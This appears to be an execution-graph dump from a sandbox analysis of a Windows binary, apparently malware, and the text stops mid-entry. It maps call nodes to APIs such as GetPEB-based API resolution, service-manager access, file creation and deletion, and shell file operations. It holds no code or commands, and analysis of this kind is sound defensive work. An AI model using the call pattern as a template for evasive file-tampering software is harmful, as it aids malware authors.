                                                                                                                execution_graph 3844 98e1a9 3849 991fd0 3844->3849 3846 98e295 3886 98ba9c 3846->3886 3848 98e2ab 3871 9933d3 3849->3871 3852 993cc9 4099 988c7c 3852->4099 3853 986a8d GetPEB 3853->3871 3857 98e080 RtlAllocateHeap GetPEB 3857->3871 3861 993ca3 3861->3846 3868 993cb3 4089 98c7d1 3868->4089 3871->3852 3871->3853 3871->3857 3871->3861 3871->3868 3874 99acff RtlAllocateHeap GetPEB 3871->3874 3885 98b9d7 GetPEB 3871->3885 3889 990418 3871->3889 3899 99d14c 3871->3899 3913 98b4fc 3871->3913 3920 984700 3871->3920 3930 986cbb 3871->3930 3942 98be09 3871->3942 3953 9866b0 3871->3953 3961 99882f 3871->3961 3974 99158a 3871->3974 3978 995497 3871->3978 3985 98da93 3871->3985 3989 984cb9 3871->3989 3993 99d6b1 3871->3993 4001 99afb0 3871->4001 4010 99e612 3871->4010 4016 99519b 3871->4016 4019 99ec9b 3871->4019 4025 99c535 3871->4025 4036 981b09 3871->4036 4046 99eba2 3871->4046 4051 99dad8 3871->4051 4055 99b2fc 3871->4055 4058 99baf2 3871->4058 4069 9830be 3871->4069 4074 99c16b 3871->4074 4084 985995 3871->4084 3874->3871 3885->3871 3887 99bff0 GetPEB 3886->3887 3888 98bb17 ExitProcess 3887->3888 3888->3848 3891 99073f 3889->3891 3892 99086f 3891->3892 3894 990871 3891->3894 4113 99a98e 3891->4113 4117 9966c2 3891->4117 4121 9832b5 3891->4121 4125 984e77 3891->4125 4131 99eaa3 3891->4131 3892->3871 4136 989574 3894->4136 3903 99d4fd 3899->3903 3902 99d67f 4209 986a8d 3902->4209 3903->3902 3906 99d538 3903->3906 3907 99eaa3 RtlAllocateHeap GetPEB 3903->3907 3912 99d557 3903->3912 4189 984bb4 3903->4189 4193 98d68b 3903->4193 4197 98c706 3903->4197 4205 98b9d7 3903->4205 4201 98d5cb 3906->4201 3907->3903 3910 986a8d GetPEB 3910->3912 3912->3871 3915 98b7a3 3913->3915 3914 99a98e CloseServiceHandle GetPEB 3914->3915 3915->3914 3916 9832b5 2 API calls 3915->3916 3917 98b8ea 3915->3917 4219 98c4eb 3915->4219 4223 991070 3915->4223 3916->3915 3917->3871 3928 9849df 3920->3928 3921 989574 GetPEB 3921->3928 3922 984a21 3922->3871 3923 984bb4 2 API calls 3923->3928 3924 984a0b 4227 98d346 3924->4227 3928->3921 3928->3922 3928->3923 3928->3924 3929 98b9d7 GetPEB 3928->3929 4237 9a110e 3928->4237 4251 99734a 3928->4251 3929->3928 4282 98588d 3930->4282 3932 9870ab 3933 984bb4 RtlAllocateHeap GetPEB 3932->3933 3934 987204 3932->3934 3935 9870da 3932->3935 3938 99734a GetPEB 3932->3938 3941 98b9d7 GetPEB 3932->3941 4285 98f2b9 3932->4285 4288 991bed 3932->4288 3933->3932 3934->3934 3937 9a110e 2 API calls 3935->3937 3939 9870fb 3937->3939 3938->3932 3939->3871 3941->3932 3947 98c23f 3942->3947 3944 984bb4 2 API calls 3944->3947 3945 98c431 4300 99e373 3945->4300 3947->3944 3947->3945 3949 98c42f 3947->3949 3950 99734a GetPEB 3947->3950 3952 98b9d7 GetPEB 3947->3952 4292 98f1d5 3947->4292 4296 99bf1c 3947->4296 4304 9918f7 3947->4304 3949->3871 3950->3947 3952->3947 3955 986937 3953->3955 3954 99bf1c 2 API calls 3954->3955 3955->3954 3957 986a80 3955->3957 3958 989574 GetPEB 3955->3958 3959 99e373 2 API calls 3955->3959 3960 9918f7 GetPEB 3955->3960 4308 99ba34 3955->4308 3957->3871 3958->3955 3959->3955 3960->3955 3970 998f07 3961->3970 3963 99915b 3966 99a98e 2 API calls 3963->3966 3964 9966c2 2 API calls 3964->3970 3965 9832b5 2 API calls 3965->3970 3968 999159 3966->3968 3967 99a98e 2 API calls 3967->3970 3968->3871 3969 984bb4 2 API calls 3969->3970 3970->3963 3970->3964 3970->3965 3970->3967 3970->3968 3970->3969 3972 991bed GetPEB 3970->3972 3973 98b9d7 GetPEB 3970->3973 4312 983511 3970->4312 4325 9840d2 3970->4325 3972->3970 3973->3970 3976 9915a4 3974->3976 3975 9909f9 LoadLibraryW RtlAllocateHeap GetPEB 3975->3976 3976->3975 3977 9916a8 3976->3977 3977->3871 3983 9954b9 3978->3983 3979 99587a 3981 984627 GetPEB 3979->3981 3980 995878 3980->3871 3981->3980 3983->3979 3983->3980 3984 99eaa3 2 API calls 3983->3984 4341 984627 3983->4341 3984->3983 3986 98daa9 3985->3986 3987 99bff0 GetPEB 3986->3987 3988 98db4e 3987->3988 3988->3871 3990 984cd5 3989->3990 3991 99bff0 GetPEB 3990->3991 3992 984d6f 3991->3992 3992->3871 3994 99d91e 3993->3994 3997 99da08 3994->3997 3998 984bb4 2 API calls 3994->3998 3999 99734a GetPEB 3994->3999 4000 98b9d7 GetPEB 3994->4000 4353 98ffde 3994->4353 4357 995d68 3994->4357 3997->3871 3998->3994 3999->3994 4000->3994 4004 99afca 4001->4004 4002 99eaa3 2 API calls 4002->4004 4003 99b130 4005 986a8d GetPEB 4003->4005 4004->4002 4004->4003 4007 99b12e 4004->4007 4381 98c5c3 4004->4381 4385 995031 4004->4385 4389 9a225a 4004->4389 4005->4007 4007->3871 4013 99e794 4010->4013 4014 99eaa3 2 API calls 4013->4014 4015 99e822 4013->4015 4509 9a032a 4013->4509 4513 99aa59 4013->4513 4014->4013 4015->3871 4017 99eaa3 2 API calls 4016->4017 4018 9951d5 4017->4018 4018->3871 4020 99ee36 4019->4020 4021 99ef0f 4020->4021 4024 98ffde GetPEB 4020->4024 4517 98ba25 4020->4517 4520 990c7c 4020->4520 4021->3871 4024->4020 4034 99cd1c 4025->4034 4027 984bb4 RtlAllocateHeap GetPEB 4027->4034 4028 991bed GetPEB 4028->4034 4029 99ade9 GetPEB 4029->4034 4030 9966c2 2 API calls 4030->4034 4031 99cfb1 4031->3871 4034->4027 4034->4028 4034->4029 4034->4030 4034->4031 4035 98b9d7 GetPEB 4034->4035 4558 983f09 4034->4558 4562 9a1cad 4034->4562 4566 983152 4034->4566 4035->4034 4043 981b3f 4036->4043 4038 98b184 GetPEB 4038->4043 4039 98225e 4039->3871 4043->4038 4043->4039 4045 986a8d GetPEB 4043->4045 4570 98a01c 4043->4570 4587 9a27df 4043->4587 4597 9995a8 4043->4597 4614 999184 4043->4614 4623 9947d2 4043->4623 4045->4043 4047 99ec4b 4046->4047 4049 99ec91 4047->4049 4050 99eaa3 2 API calls 4047->4050 4766 9a03f2 4047->4766 4049->3871 4050->4047 4052 99dd12 4051->4052 4053 98f2b9 GetPEB 4052->4053 4054 99dd3a 4052->4054 4053->4052 4054->3871 4056 984cb9 GetPEB 4055->4056 4057 99b37d 4056->4057 4057->3871 4059 99bb13 4058->4059 4065 99bf0f 4059->4065 4066 99eaa3 2 API calls 4059->4066 4799 98bb23 4059->4799 4806 9a086f 4059->4806 4818 99f24c 4059->4818 4839 982279 4059->4839 4857 98ced8 4059->4857 4865 9a13fd 4059->4865 4873 99692b 4059->4873 4065->3871 4066->4059 4070 98588d GetPEB 4069->4070 4071 98313a 4070->4071 5006 99da13 4071->5006 4075 99c3a6 4074->4075 4076 986a8d GetPEB 4075->4076 4078 99c516 4075->4078 4082 99c514 4075->4082 5010 995cb1 4075->5010 5014 990097 4075->5014 5019 98f605 4075->5019 5023 98e2b2 4075->5023 4076->4075 5026 98f9a7 4078->5026 4082->3871 4087 985aa2 4084->4087 4086 985b7d 4086->3871 4087->4086 5030 995c05 4087->5030 5034 98e0eb 4087->5034 4092 98c7eb 4089->4092 4090 984bb4 RtlAllocateHeap GetPEB 4090->4092 4091 9966c2 2 API calls 4091->4092 4092->4090 4092->4091 4093 98ce91 4092->4093 4095 98c453 GetPEB 4092->4095 4096 98ce8f 4092->4096 4097 98b9d7 GetPEB 4092->4097 4098 991bed GetPEB 4092->4098 4094 9963f0 3 API calls 4093->4094 4094->4096 4095->4092 4096->3861 4097->4092 4098->4092 4101 988fba 4099->4101 4100 984bb4 2 API calls 4100->4101 4101->4100 4103 99734a GetPEB 4101->4103 4105 9890e2 4101->4105 4106 98b9d7 GetPEB 4101->4106 4108 9a110e 2 API calls 4101->4108 4109 98b4fc 4 API calls 4101->4109 4111 9890e0 4101->4111 5038 98d899 4101->5038 5045 989133 4101->5045 4103->4101 4107 98ffde GetPEB 4105->4107 4106->4101 4110 9890fb 4107->4110 4108->4101 4109->4101 5054 98f6cf 4110->5054 4111->3861 4114 99a9a1 4113->4114 4140 99bff0 4114->4140 4118 9966e9 4117->4118 4119 99bff0 GetPEB 4118->4119 4120 99676b SHGetFolderPathW 4119->4120 4120->3891 4122 9832cd 4121->4122 4123 99bff0 GetPEB 4122->4123 4124 98337c OpenSCManagerW 4123->4124 4124->3891 4130 984fae 4125->4130 4128 989574 GetPEB 4128->4130 4129 985080 4129->3891 4130->4128 4130->4129 4170 99ade9 4130->4170 4174 9a07bb 4130->4174 4178 98645e 4131->4178 4135 99eb9a 4135->3891 4137 98958e 4136->4137 4185 989aac 4137->4185 4141 99aa46 CloseServiceHandle 4140->4141 4142 99c0a6 4140->4142 4141->3891 4146 9a1ae9 4142->4146 4144 99c0ba 4149 99b558 4144->4149 4153 99aa52 GetPEB 4146->4153 4148 9a1b98 4148->4144 4151 99b575 4149->4151 4150 99b64f 4150->4141 4151->4150 4154 99b384 4151->4154 4153->4148 4155 99b4de 4154->4155 4162 99e545 4155->4162 4158 99b520 4160 99b54f 4158->4160 4161 99b558 GetPEB 4158->4161 4160->4150 4161->4160 4163 99e558 4162->4163 4164 99bff0 GetPEB 4163->4164 4165 99b506 4164->4165 4165->4158 4166 99e9a4 4165->4166 4167 99e9b4 4166->4167 4168 99bff0 GetPEB 4167->4168 4169 99ea43 4168->4169 4169->4158 4171 99ae00 4170->4171 4172 99bff0 GetPEB 4171->4172 4173 99aea1 4172->4173 4173->4130 4175 9a07d1 4174->4175 4176 99bff0 GetPEB 4175->4176 4177 9a0861 4176->4177 4177->4130 4179 99bff0 GetPEB 4178->4179 4180 9864fc 4179->4180 4181 991b22 4180->4181 4182 991b41 4181->4182 4183 99bff0 GetPEB 4182->4183 4184 991bdd RtlAllocateHeap 4183->4184 4184->4135 4186 989ace 4185->4186 4187 99bff0 GetPEB 4186->4187 4188 989601 4187->4188 4188->3892 4190 984bce 4189->4190 4191 99eaa3 2 API calls 4190->4191 4192 984c3e 4191->4192 4192->3903 4192->4192 4194 98d6aa 4193->4194 4195 99bff0 GetPEB 4194->4195 4196 98d746 4195->4196 4196->3903 4198 98c728 4197->4198 4199 99bff0 GetPEB 4198->4199 4200 98c7bd 4199->4200 4200->3903 4202 98d5e4 4201->4202 4203 99bff0 GetPEB 4202->4203 4204 98d67d 4203->4204 4204->3912 4206 98b9e9 4205->4206 4207 986a8d GetPEB 4206->4207 4208 98ba1e 4207->4208 4208->3903 4210 986a9d 4209->4210 4211 98645e GetPEB 4210->4211 4212 986bbb 4211->4212 4215 9950b6 4212->4215 4216 9950d5 4215->4216 4217 99bff0 GetPEB 4216->4217 4218 986bd4 4217->4218 4218->3910 4220 98c507 4219->4220 4221 99bff0 GetPEB 4220->4221 4222 98c5b2 OpenServiceW 4221->4222 4222->3915 4224 991089 4223->4224 4225 99bff0 GetPEB 4224->4225 4226 991122 4225->4226 4226->3915 4228 98d35d 4227->4228 4229 984bb4 2 API calls 4228->4229 4230 98d4ea 4229->4230 4255 98fd5f 4230->4255 4233 98b9d7 GetPEB 4234 98d516 4233->4234 4259 989ea8 4234->4259 4236 98d52a 4236->3922 4238 9a1128 4237->4238 4266 98b184 4238->4266 4241 98b184 GetPEB 4242 9a1378 4241->4242 4243 98b184 GetPEB 4242->4243 4244 9a138d 4243->4244 4245 9a07bb GetPEB 4244->4245 4246 9a13a2 4245->4246 4247 9a07bb GetPEB 4246->4247 4248 9a13ba 4247->4248 4270 98338b 4248->4270 4250 9a13f0 4250->3928 4252 99736f 4251->4252 4253 98f56b GetPEB 4252->4253 4254 99738c 4253->4254 4254->3928 4256 98fd7b 4255->4256 4263 98f56b 4256->4263 4260 989ebe 4259->4260 4261 99bff0 GetPEB 4260->4261 4262 989f4d DeleteFileW 4261->4262 4262->4236 4264 99bff0 GetPEB 4263->4264 4265 98d507 4264->4265 4265->4233 4267 98b19a 4266->4267 4274 99c0df 4267->4274 4271 98339b 4270->4271 4272 99bff0 GetPEB 4271->4272 4273 983449 SHFileOperationW 4272->4273 4273->4250 4275 99c0fa 4274->4275 4278 99e0ca 4275->4278 4279 99e0e7 4278->4279 4280 99bff0 GetPEB 4279->4280 4281 98b1f9 4280->4281 4281->4241 4283 99bff0 GetPEB 4282->4283 4284 985939 4283->4284 4284->3932 4286 99bff0 GetPEB 4285->4286 4287 98f361 4286->4287 4287->3932 4289 991c12 4288->4289 4290 98f56b GetPEB 4289->4290 4291 991c34 4290->4291 4291->3932 4293 98f1fa 4292->4293 4294 99bff0 GetPEB 4293->4294 4295 98f2a8 SetFileInformationByHandle 4294->4295 4295->3947 4297 99bf49 4296->4297 4298 99bff0 GetPEB 4297->4298 4299 99bfd6 CreateFileW 4298->4299 4299->3947 4301 99e389 4300->4301 4302 99bff0 GetPEB 4301->4302 4303 99e42b CloseHandle 4302->4303 4303->3949 4305 99190a 4304->4305 4306 99bff0 GetPEB 4305->4306 4307 991999 4306->4307 4307->3947 4309 99ba53 4308->4309 4310 99bff0 GetPEB 4309->4310 4311 99bae0 4310->4311 4311->3955 4319 983537 4312->4319 4313 99eaa3 RtlAllocateHeap GetPEB 4313->4319 4314 983c34 4315 986a8d GetPEB 4314->4315 4317 983c45 4315->4317 4317->3970 4318 986a8d GetPEB 4318->4319 4319->4313 4319->4314 4319->4317 4319->4318 4321 99a98e 2 API calls 4319->4321 4322 98c4eb 2 API calls 4319->4322 4324 98f2b9 GetPEB 4319->4324 4329 99b14e 4319->4329 4333 9913d4 4319->4333 4337 99a3e6 4319->4337 4321->4319 4322->4319 4324->4319 4326 98411c 4325->4326 4327 99bff0 GetPEB 4326->4327 4328 98419f 4327->4328 4328->3970 4330 99b16a 4329->4330 4331 99bff0 GetPEB 4330->4331 4332 99b205 4331->4332 4332->4319 4334 99140f 4333->4334 4335 99bff0 GetPEB 4334->4335 4336 9914bb 4335->4336 4336->4319 4338 99a415 4337->4338 4339 99bff0 GetPEB 4338->4339 4340 99a4a0 4339->4340 4340->4319 4342 984640 4341->4342 4345 991d1c 4342->4345 4346 991d3a 4345->4346 4349 982fe6 4346->4349 4350 983002 4349->4350 4351 99bff0 GetPEB 4350->4351 4352 9830ae 4351->4352 4352->3983 4354 98fff1 4353->4354 4355 99bff0 GetPEB 4354->4355 4356 99008b 4355->4356 4356->3994 4363 995d94 4357->4363 4358 9963d3 4377 98428c 4358->4377 4360 9963d1 4360->3994 4361 984bb4 RtlAllocateHeap GetPEB 4361->4363 4363->4358 4363->4360 4363->4361 4365 99734a GetPEB 4363->4365 4366 995d68 2 API calls 4363->4366 4367 98fd5f GetPEB 4363->4367 4368 98b9d7 GetPEB 4363->4368 4369 98fa6c 4363->4369 4373 98fe4b 4363->4373 4365->4363 4366->4363 4367->4363 4368->4363 4370 98fa85 4369->4370 4371 99bff0 GetPEB 4370->4371 4372 98fb15 4371->4372 4372->4363 4374 98fe5e 4373->4374 4375 99bff0 GetPEB 4374->4375 4376 98fef3 4375->4376 4376->4363 4378 9842a5 4377->4378 4379 99bff0 GetPEB 4378->4379 4380 984337 4379->4380 4380->4360 4382 98c635 4381->4382 4384 98c61f 4381->4384 4382->4004 4383 986a8d GetPEB 4383->4384 4384->4382 4384->4383 4386 995047 4385->4386 4399 990b4c 4386->4399 4393 9a252f 4389->4393 4390 9a2704 4390->4004 4391 984bb4 2 API calls 4391->4393 4392 9a26f3 4394 986a8d GetPEB 4392->4394 4393->4390 4393->4391 4393->4392 4396 99eaa3 2 API calls 4393->4396 4397 98b9d7 GetPEB 4393->4397 4501 99acff 4393->4501 4505 98c453 4393->4505 4394->4390 4396->4393 4397->4393 4404 990b68 4399->4404 4402 990c59 4403 986a8d GetPEB 4402->4403 4406 990c57 4403->4406 4404->4402 4405 99eaa3 2 API calls 4404->4405 4404->4406 4408 987786 4404->4408 4425 98508b 4404->4425 4434 983210 4404->4434 4405->4404 4406->4004 4421 98842c 4408->4421 4409 9888b0 4410 98d5cb GetPEB 4409->4410 4411 9888ae 4410->4411 4411->4404 4413 98f36a GetPEB 4413->4421 4418 984bb4 RtlAllocateHeap GetPEB 4418->4421 4421->4409 4421->4411 4421->4413 4421->4418 4422 98d68b GetPEB 4421->4422 4423 991d1c GetPEB 4421->4423 4424 98b9d7 GetPEB 4421->4424 4439 989f58 4421->4439 4443 98bd30 4421->4443 4447 98b40a 4421->4447 4451 98fd9d 4421->4451 4455 997473 4421->4455 4481 984d7d 4421->4481 4485 99677f 4421->4485 4422->4421 4423->4421 4424->4421 4430 9855c3 4425->4430 4426 98575b 4426->4404 4427 984bb4 RtlAllocateHeap GetPEB 4427->4430 4428 98575d 4429 98d5cb GetPEB 4428->4429 4429->4426 4430->4426 4430->4427 4430->4428 4431 98b40a GetPEB 4430->4431 4432 98d68b GetPEB 4430->4432 4433 98b9d7 GetPEB 4430->4433 4431->4430 4432->4430 4433->4430 4435 99677f GetPEB 4434->4435 4436 98329c 4435->4436 4437 986a8d GetPEB 4436->4437 4438 9832af 4437->4438 4438->4404 4440 989f7a 4439->4440 4441 99bff0 GetPEB 4440->4441 4442 98a009 4441->4442 4442->4421 4444 98bd52 4443->4444 4445 99bff0 GetPEB 4444->4445 4446 98bdf5 4445->4446 4446->4421 4448 98b43a 4447->4448 4449 99bff0 GetPEB 4448->4449 4450 98b4e0 4449->4450 4450->4421 4452 98fdb3 4451->4452 4453 99bff0 GetPEB 4452->4453 4454 98fe3d 4453->4454 4454->4421 4473 998307 4455->4473 4456 984bb4 RtlAllocateHeap GetPEB 4456->4473 4457 98d5cb GetPEB 4457->4473 4458 984bb4 RtlAllocateHeap GetPEB 4476 9986af 4458->4476 4459 998558 4464 984bb4 2 API calls 4459->4464 4460 986a8d GetPEB 4460->4473 4462 9987d6 4462->4421 4463 99eaa3 2 API calls 4463->4473 4465 998578 4464->4465 4466 984bb4 2 API calls 4465->4466 4468 99859a 4466->4468 4467 98d68b GetPEB 4467->4476 4469 99ade9 GetPEB 4468->4469 4471 9985c6 4469->4471 4497 99cfc3 4471->4497 4473->4456 4473->4457 4473->4459 4473->4460 4473->4462 4473->4463 4473->4476 4478 98b9d7 GetPEB 4473->4478 4489 988ab6 4473->4489 4493 9865d5 4473->4493 4474 98b9d7 GetPEB 4474->4476 4476->4458 4476->4467 4476->4474 4477 98b9d7 GetPEB 4479 998697 4477->4479 4478->4473 4480 98b9d7 GetPEB 4479->4480 4480->4476 4482 984dad 4481->4482 4483 99bff0 GetPEB 4482->4483 4484 984e5c 4483->4484 4484->4421 4486 996792 4485->4486 4487 99bff0 GetPEB 4486->4487 4488 996834 4487->4488 4488->4421 4490 988af6 4489->4490 4491 99bff0 GetPEB 4490->4491 4492 988baa 4491->4492 4492->4473 4494 986602 4493->4494 4495 99bff0 GetPEB 4494->4495 4496 986697 4495->4496 4496->4473 4498 99cff4 4497->4498 4499 99bff0 GetPEB 4498->4499 4500 998667 4499->4500 4500->4477 4502 99ad1f 4501->4502 4503 99eaa3 2 API calls 4502->4503 4504 99ad9c 4503->4504 4504->4393 4504->4504 4506 98c481 4505->4506 4507 98f56b GetPEB 4506->4507 4508 98c4a8 4507->4508 4508->4393 4510 9a0343 4509->4510 4511 99bff0 GetPEB 4510->4511 4512 9a03e4 4511->4512 4512->4013 4514 99aa83 4513->4514 4515 99bff0 GetPEB 4514->4515 4516 99ab22 4515->4516 4516->4013 4528 993cdd 4517->4528 4521 990c9d 4520->4521 4551 98f43b 4521->4551 4524 990e00 4524->4020 4527 99e373 2 API calls 4527->4524 4531 993d02 4528->4531 4534 98ba93 4531->4534 4535 993f17 4531->4535 4537 985942 4531->4537 4540 991a72 4531->4540 4544 99efa0 4531->4544 4548 98b34c 4531->4548 4534->4020 4536 99e373 2 API calls 4535->4536 4536->4534 4538 98588d GetPEB 4537->4538 4539 98597a 4538->4539 4539->4531 4541 991a88 4540->4541 4542 99bff0 GetPEB 4541->4542 4543 991b14 4542->4543 4543->4531 4545 99efb9 4544->4545 4546 99bff0 GetPEB 4545->4546 4547 99f052 4546->4547 4547->4531 4549 99bff0 GetPEB 4548->4549 4550 98b3f2 4549->4550 4550->4531 4552 99bff0 GetPEB 4551->4552 4553 98f4f2 4552->4553 4553->4524 4554 9914da 4553->4554 4555 9914f9 4554->4555 4556 99bff0 GetPEB 4555->4556 4557 990dee 4556->4557 4557->4527 4559 983f42 4558->4559 4560 99bff0 GetPEB 4559->4560 4561 983ff1 4560->4561 4561->4034 4563 9a1cd8 4562->4563 4564 99bff0 GetPEB 4563->4564 4565 9a1d53 4564->4565 4565->4034 4567 983169 4566->4567 4568 99bff0 GetPEB 4567->4568 4569 983203 4568->4569 4569->4034 4585 98a07f 4570->4585 4572 995b4c GetPEB 4572->4585 4573 98b074 4667 995b4c 4573->4667 4575 984bb4 2 API calls 4575->4585 4577 98b08a 4577->4043 4582 98b9d7 GetPEB 4582->4585 4583 986a8d GetPEB 4583->4585 4585->4572 4585->4573 4585->4575 4585->4577 4585->4582 4585->4583 4586 99e29a GetPEB 4585->4586 4635 9941cf 4585->4635 4644 985797 4585->4644 4648 985b8a 4585->4648 4651 986505 4585->4651 4655 98400f 4585->4655 4659 99aeae 4585->4659 4663 99b215 4585->4663 4586->4585 4595 9a2a55 4587->4595 4589 9a2bb0 4591 986a8d GetPEB 4589->4591 4590 99eaa3 2 API calls 4590->4595 4592 9a2bae 4591->4592 4592->4043 4593 984bb4 2 API calls 4593->4595 4594 98f56b GetPEB 4594->4595 4595->4589 4595->4590 4595->4592 4595->4593 4595->4594 4596 98b9d7 GetPEB 4595->4596 4679 9951e8 4595->4679 4596->4595 4606 999fc8 4597->4606 4598 986a8d GetPEB 4598->4606 4599 99a353 4600 99e18b 2 API calls 4599->4600 4602 99a379 4600->4602 4601 991d1c GetPEB 4601->4606 4698 98c4b0 4602->4698 4603 99eaa3 RtlAllocateHeap GetPEB 4603->4606 4606->4598 4606->4599 4606->4601 4606->4603 4607 984bb4 2 API calls 4606->4607 4611 98f56b GetPEB 4606->4611 4612 99a34e 4606->4612 4613 98b9d7 GetPEB 4606->4613 4690 99e18b 4606->4690 4694 999556 4606->4694 4607->4606 4610 98b9d7 GetPEB 4610->4612 4611->4606 4612->4043 4613->4606 4615 9991ae 4614->4615 4616 999537 4615->4616 4619 999535 4615->4619 4621 99eaa3 2 API calls 4615->4621 4622 991d1c GetPEB 4615->4622 4702 9916ad 4615->4702 4708 989617 4615->4708 4618 986a8d GetPEB 4616->4618 4618->4619 4619->4043 4621->4615 4622->4615 4624 9947fd 4623->4624 4625 99500a 4624->4625 4630 986a8d GetPEB 4624->4630 4631 98e379 2 API calls 4624->4631 4632 99501e 4624->4632 4633 991d1c GetPEB 4624->4633 4634 99eaa3 2 API calls 4624->4634 4750 984342 4624->4750 4755 99a4b5 4624->4755 4762 988bcb 4624->4762 4629 986a8d GetPEB 4625->4629 4629->4632 4630->4624 4631->4624 4632->4043 4633->4624 4634->4624 4637 994420 4635->4637 4636 994518 4638 994520 4636->4638 4640 986a8d GetPEB 4636->4640 4637->4636 4641 99eaa3 RtlAllocateHeap GetPEB 4637->4641 4642 991d1c GetPEB 4637->4642 4643 986a8d GetPEB 4637->4643 4671 987209 4637->4671 4638->4585 4640->4638 4641->4637 4642->4637 4643->4637 4645 9857d2 4644->4645 4646 99bff0 GetPEB 4645->4646 4647 985872 4646->4647 4647->4585 4675 9a1933 4648->4675 4652 98652a 4651->4652 4653 99bff0 GetPEB 4652->4653 4654 9865c3 4653->4654 4654->4585 4656 984036 4655->4656 4657 99bff0 GetPEB 4656->4657 4658 9840bd 4657->4658 4658->4585 4660 99aedf 4659->4660 4661 99bff0 GetPEB 4660->4661 4662 99af74 4661->4662 4662->4585 4664 99b237 4663->4664 4665 99bff0 GetPEB 4664->4665 4666 99b2e9 4665->4666 4666->4585 4668 995b62 4667->4668 4669 99bff0 GetPEB 4668->4669 4670 995bfa 4669->4670 4670->4577 4672 98722b 4671->4672 4673 99bff0 GetPEB 4672->4673 4674 9872b9 4673->4674 4674->4637 4676 9a1957 4675->4676 4677 99bff0 GetPEB 4676->4677 4678 985c87 4677->4678 4678->4585 4683 9951fe 4679->4683 4680 99545d 4682 98c63a GetPEB 4680->4682 4681 99545b 4681->4595 4682->4681 4683->4680 4683->4681 4685 99eaa3 2 API calls 4683->4685 4686 98c63a 4683->4686 4685->4683 4687 98c662 4686->4687 4688 99bff0 GetPEB 4687->4688 4689 98c6f0 4688->4689 4689->4683 4691 99e1a5 4690->4691 4692 99eaa3 2 API calls 4691->4692 4693 99e230 4692->4693 4693->4606 4693->4693 4695 99957e 4694->4695 4696 98f56b GetPEB 4695->4696 4697 9995a0 4696->4697 4697->4606 4699 98c4c9 4698->4699 4700 98f56b GetPEB 4699->4700 4701 98c4e3 4700->4701 4701->4610 4703 9916c7 4702->4703 4704 9918a9 4703->4704 4707 9918a7 4703->4707 4715 98e379 4703->4715 4730 99595c 4704->4730 4707->4615 4711 989644 4708->4711 4709 99eaa3 2 API calls 4709->4711 4710 9912ef GetPEB 4710->4711 4711->4709 4711->4710 4712 989996 4711->4712 4713 989985 4711->4713 4712->4615 4714 986a8d GetPEB 4713->4714 4714->4712 4728 98e3b8 4715->4728 4716 98f19d 4717 98d5cb GetPEB 4716->4717 4718 98f19b 4717->4718 4718->4703 4720 99eaa3 2 API calls 4720->4728 4722 9865d5 GetPEB 4722->4728 4724 986a8d GetPEB 4724->4728 4726 984bb4 RtlAllocateHeap GetPEB 4726->4728 4727 98d68b GetPEB 4727->4728 4728->4716 4728->4718 4728->4720 4728->4722 4728->4724 4728->4726 4728->4727 4729 98b9d7 GetPEB 4728->4729 4734 9841c6 4728->4734 4738 98b8f4 4728->4738 4742 98fb23 4728->4742 4746 99ac2c 4728->4746 4729->4728 4731 995988 4730->4731 4732 99bff0 GetPEB 4731->4732 4733 995a2b 4732->4733 4733->4707 4735 9841eb 4734->4735 4736 99bff0 GetPEB 4735->4736 4737 984279 4736->4737 4737->4728 4739 98b919 4738->4739 4740 99bff0 GetPEB 4739->4740 4741 98b9c4 4740->4741 4741->4728 4743 98fb3c 4742->4743 4744 99bff0 GetPEB 4743->4744 4745 98fbed 4744->4745 4745->4728 4747 99ac56 4746->4747 4748 99bff0 GetPEB 4747->4748 4749 99ace2 4748->4749 4749->4728 4752 984361 4750->4752 4751 9845f4 4751->4624 4752->4751 4753 984627 GetPEB 4752->4753 4754 99eaa3 2 API calls 4752->4754 4753->4752 4754->4752 4756 99a4e1 4755->4756 4757 99e436 GetPEB 4756->4757 4758 99a872 4756->4758 4759 99a861 4756->4759 4760 99eaa3 2 API calls 4756->4760 4757->4756 4758->4624 4761 986a8d GetPEB 4759->4761 4760->4756 4761->4758 4763 988bde 4762->4763 4764 991d1c GetPEB 4763->4764 4765 988c72 4764->4765 4765->4624 4767 9a041a 4766->4767 4769 9a06d7 4767->4769 4777 9a0738 4767->4777 4787 986bfa 4767->4787 4770 99e18b 2 API calls 4769->4770 4771 9a06f1 4770->4771 4778 99112d 4771->4778 4776 98b9d7 GetPEB 4776->4777 4777->4047 4791 984b09 4778->4791 4782 9912e4 4783 99ef56 4782->4783 4784 99ef7b 4783->4784 4785 98f56b GetPEB 4784->4785 4786 99ef98 4785->4786 4786->4776 4788 986c16 4787->4788 4789 99bff0 GetPEB 4788->4789 4790 986cad 4789->4790 4790->4767 4792 984b23 4791->4792 4793 99bff0 GetPEB 4792->4793 4794 984ba7 4793->4794 4794->4782 4795 99683f 4794->4795 4796 996871 4795->4796 4797 99bff0 GetPEB 4796->4797 4798 996911 4797->4798 4798->4782 4804 98bcba 4799->4804 4800 98bd24 4800->4059 4801 986a8d GetPEB 4801->4804 4802 984cb9 GetPEB 4802->4804 4804->4800 4804->4801 4804->4802 4805 99e373 2 API calls 4804->4805 4893 990f7a 4804->4893 4805->4804 4807 9a0d01 4806->4807 4808 9a0d19 4807->4808 4809 989574 GetPEB 4807->4809 4811 9a0d42 4807->4811 4812 98ffde GetPEB 4807->4812 4814 984bb4 2 API calls 4807->4814 4815 99734a GetPEB 4807->4815 4816 98b9d7 GetPEB 4807->4816 4911 98b200 4807->4911 4915 989b80 4807->4915 4901 9963f0 4808->4901 4809->4807 4811->4059 4812->4807 4814->4807 4815->4807 4816->4807 4930 99e034 4818->4930 4820 9963f0 3 API calls 4836 99fedc 4820->4836 4821 9966c2 2 API calls 4821->4836 4822 9a02ff 4827 99e373 2 API calls 4822->4827 4823 99ade9 GetPEB 4823->4836 4824 9951e8 2 API calls 4824->4836 4826 9a02fd 4826->4059 4827->4826 4829 989574 GetPEB 4829->4836 4830 991bed GetPEB 4830->4836 4831 986a8d GetPEB 4831->4836 4832 98ffde GetPEB 4832->4836 4833 98b200 GetPEB 4833->4836 4834 984bb4 RtlAllocateHeap GetPEB 4834->4836 4835 99734a GetPEB 4835->4836 4836->4820 4836->4821 4836->4822 4836->4823 4836->4824 4836->4826 4836->4829 4836->4830 4836->4831 4836->4832 4836->4833 4836->4834 4836->4835 4837 98b9d7 GetPEB 4836->4837 4838 989b80 3 API calls 4836->4838 4933 98f784 4836->4933 4939 98d7a6 4836->4939 4837->4836 4838->4836 4841 982bc8 4839->4841 4840 9963f0 3 API calls 4840->4841 4841->4840 4844 989574 GetPEB 4841->4844 4845 9830be GetPEB 4841->4845 4846 99e373 GetPEB CloseHandle 4841->4846 4848 98ffde GetPEB 